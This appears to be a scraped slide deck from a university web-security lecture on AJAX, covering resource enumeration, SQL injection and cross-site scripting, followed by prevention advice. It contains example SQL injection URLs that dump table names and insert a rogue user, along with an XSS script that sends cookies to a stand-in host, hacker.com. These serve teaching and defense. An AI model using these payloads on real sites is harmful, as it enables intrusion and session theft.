Upload
madamewoolf
View
256
Download
7
Tags:
Embed Size (px)
DESCRIPTION
Citation preview
CSE 136 - Lecture 8
AJAX Presentation Layer Security Lab
AJAX - what & why?
Asynchronous Javascript and XML
Why? To avoid postback -
saves page re-loading time
Transfer smaller amount of data across network
Example: select year, make, model
Improve performance
AJAX - flow
Ajax - postback vs callback
Ajax - ASP.NET Ajax Architecture
basic functionality - stringmanipulation, components,networking, and webservices
provideobject-orientedtechniques withJavaScript code
Web Attack - Resource Enumeration
Common Files test.txt back.zip upload.zip passwords.txt users.txt checkout.aspx.bak checkout.asp.old
Common Directories /admin /reports /test /upload /temp /include /logs
Web Attack - Parameter manipulation
/student/details/1000 change to 1001? SQL Injection
query = "select product_name from product where product_id=" + PID
PID comes from web parameter: http://myweb.com/product.aspx?PID=1 http://myweb.com/product.aspx?PID=1;union
select name from sysobjects where xtype='U' Hackers add himself to the Users table
http://myweb.com/product.aspx?PID=1; insert into Users (uname, pword) values ('hacker', 'hacked')
Web Attack – cross site scripting (XSS)
Once you comprise the database, insert javascript into the tables product.description
= ,'<script>document.location='http://hacker.com/collector.html? cookie='+document.cookie</script>
Hacker now knows your cookie when the content is rendered.
Danger of cross site scripting Contents of the current document cookie is sent off to
hacker.com Session IDs and authentication tokens are commonly stored
in cookies Javascript can log key strokes
Web Attack - Prevention
Remove all SQL Injection code HTML-Encode all data displayed to prevent XSS Treat any input as potential threat
user can enter javascript in textbox and textarea Use validation on the server (user could disable javascript error
checking on browser) Encrypt cookies
user_id="100" // No user_id="CQZJU-VQRQF-LAWFI-HGCPL-MTNTS-JYOPD-TIJYV-INMYJ-
TVLLC-RWJOT-CTHAM-GJQHD" Upload Files:
Email attachment Business documents Servers should run Virus checker on all uploaded files
Web Attack and AJAX
The methods of a Web service are analogous to the form inputs of a Web application.
They are easy to find, easy to attack
WSDL is now open to public (example data often provided)
Web Attack - Traditional vs AJAX
Traditional:
These features arehidden from the User
AJAX & Web-services:
each feature is nowexposed to the public
Web Attack - white vs. black
Traditional Black Box:
filtered data at theweb server
(only last 4 digit ofcc number)Whitebox:
Unfiltered data fromBusiness/service Layer
(show entire cc number)Exposed BL domain model
Web Attack - Ajax security mistakes
Traditional:
Ajax service
Hacker bypass the admin file directly and go directly to AJAX files to access the info
Ajax serviceexposed toeveryone
Solution:Use cookie at the WEB web-service
Web Attack - Securing Ajax server
Install validation filter Use Regular
Expression to validate input strings
Use Regular Expression to remove "attack" characters: < & \ />, etc
Validate user thru cookies/sessions (WEB web-services)
Review question
Is ajax synchronous or asynchronous? Why used ajax? Is ajax architecture more secured or less? What is XSS? Difference between white box and black box?
Your assignment
Complete your MVC project with test cases
Project due next Thursday
Lab
Due: Grade your middle tier and test cases
References
.NET : Architecting Applications for the Enterprise
Ajax Security